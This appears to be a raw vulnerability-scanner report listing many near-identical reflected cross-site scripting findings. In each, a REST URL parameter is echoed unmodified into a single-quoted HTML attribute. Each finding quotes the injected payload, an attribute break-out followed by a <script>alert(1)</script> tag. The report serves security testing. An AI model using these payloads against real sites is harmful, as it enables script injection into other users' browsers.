This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58282'><script>alert(1)</script>e844c762b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad24f'><script>alert(1)</script>80b0e78178b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cf7a'><script>alert(1)</script>4971be75db1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3b91e'><script>alert(1)</script>09a0fb82f54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80300'><script>alert(1)</script>a8fa8110624 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ff16'><script>alert(1)</script>776fd51402b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e25ea'><script>alert(1)</script>76e833ea6be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6526f'><script>alert(1)</script>a83c4abad5c was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5a0d'><script>alert(1)</script>9c48b8d5610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4f27'><script>alert(1)</script>30edce3703c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d427b'><script>alert(1)</script>df1388f24cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9f67'><script>alert(1)</script>c9c54c00294 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3443b'><script>alert(1)</script>0d75aba846e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2bc2c'><script>alert(1)</script>aa458b12de5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc7bf'><script>alert(1)</script>385b89604bb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6771b'><script>alert(1)</script>d3895153ec4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86b10'><script>alert(1)</script>64da57a4779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7359e'><script>alert(1)</script>46e6790cd1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40d14'><script>alert(1)</script>a7a3b400c0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2af3b'><script>alert(1)</script>983fadd018c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da6b2'><script>alert(1)</script>50d9790c04d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9aea8'><script>alert(1)</script>4cffde98153 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73511'><script>alert(1)</script>c5406345189 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c661'><script>alert(1)</script>0a62e16d3fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cfc3'><script>alert(1)</script>4c747395f1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57892'><script>alert(1)</script>525c9a42ecb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e61b2'><script>alert(1)</script>38c945aceb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea05'><script>alert(1)</script>78d28eed1ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95ae9'><script>alert(1)</script>7c6187b617e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b330d'><script>alert(1)</script>bff079bfb71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1140'><script>alert(1)</script>fcee36dbee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e88c2'><script>alert(1)</script>700ae535ace was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57c7c'><script>alert(1)</script>8e290d4d4b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb6be'><script>alert(1)</script>8d96e95fe62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7eacf'><script>alert(1)</script>d48d4e06152 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57d66'><script>alert(1)</script>76b8e23b5fc was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd9'><script>alert(1)</script>e6672341f07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45272'><script>alert(1)</script>3dbce6c32cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa182'><script>alert(1)</script>389433e4b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f8be'><script>alert(1)</script>ecb418fd4bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ed9e'><script>alert(1)</script>d07b7742900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f4e8'><script>alert(1)</script>6f14cf79154 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload beed3'><script>alert(1)</script>9463b547838 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 850d2'><script>alert(1)</script>c70be2247dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ce65'><script>alert(1)</script>b37c89188f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee6ff'><script>alert(1)</script>31bf7d50746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e118'><script>alert(1)</script>e29be4ee5ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2797b'><script>alert(1)</script>45814a816fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b300'><script>alert(1)</script>e4786235842 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 51dad'><script>alert(1)</script>c4216718c01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe184'><script>alert(1)</script>49d61624d15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c28f'><script>alert(1)</script>fdedb6665a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b716'><script>alert(1)</script>dda84e2edf4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 163d2'><script>alert(1)</script>4b5a7551963 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eee62'><script>alert(1)</script>b63610413e9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c54bd'><script>alert(1)</script>8fe9eea30f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 781de'><script>alert(1)</script>e81528b2b32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e69b'><script>alert(1)</script>46d1ba68732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dead9'><script>alert(1)</script>a661e998c72 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25748'><script>alert(1)</script>75ed48546ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8e67'><script>alert(1)</script>ca432139a7a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae05e'><script>alert(1)</script>43a96c8bc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60e66'><script>alert(1)</script>4ab2a96df69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c704'><script>alert(1)</script>00646f627ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7012'><script>alert(1)</script>d2de17d9c7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47f83'><script>alert(1)</script>2aab50242fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32db0'><script>alert(1)</script>e3defa49987 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7019'><script>alert(1)</script>130f6c59733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 309f3'><script>alert(1)</script>31a8c96ed6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99c72'><script>alert(1)</script>eae5e6a3cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1ebe'><script>alert(1)</script>3798814995b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2a69c'><script>alert(1)</script>0c1d6eb895b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c320'><script>alert(1)</script>bad0db87fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1723'><script>alert(1)</script>cf327814464 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93eb6'><script>alert(1)</script>a65d0178827 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f7d'><script>alert(1)</script>fd76200fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abb17'><script>alert(1)</script>14015bc97f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 460ff'><script>alert(1)</script>492f1e3448f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76b39'><script>alert(1)</script>7c51dd0891d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b8d6'><script>alert(1)</script>b173df45538 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 614c9'><script>alert(1)</script>c3c334660e8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bae4'><script>alert(1)</script>fdef7069a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36da9'><script>alert(1)</script>33368b0c8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76bd9'><script>alert(1)</script>6580d333bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>34dfe38079a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7033'><script>alert(1)</script>a79b52bccc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7f93'><script>alert(1)</script>892d77dffdd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78aaa'><script>alert(1)</script>52349422dc4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3518'><script>alert(1)</script>7dca366f979 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb965'><script>alert(1)</script>4afbf610026 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 108df'><script>alert(1)</script>14fd32ebc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65a1e'><script>alert(1)</script>2fe9ad35a2f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1f854'><script>alert(1)</script>c2d270a63cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ac00'><script>alert(1)</script>c01740cc31a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e5f86'><script>alert(1)</script>0fa6f5f0ec2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9cec8'><script>alert(1)</script>4468d0104c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48113'><script>alert(1)</script>addd1ac20d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb436'><script>alert(1)</script>6e1c1c1f702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec7cf'><script>alert(1)</script>b152d7baeb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eed32'><script>alert(1)</script>685d8755ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5e27'><script>alert(1)</script>805a85f0a14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39625'><script>alert(1)</script>ab29d75d606 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47bd5'><script>alert(1)</script>45b1450fbe6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bf99'><script>alert(1)</script>289c701a59c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
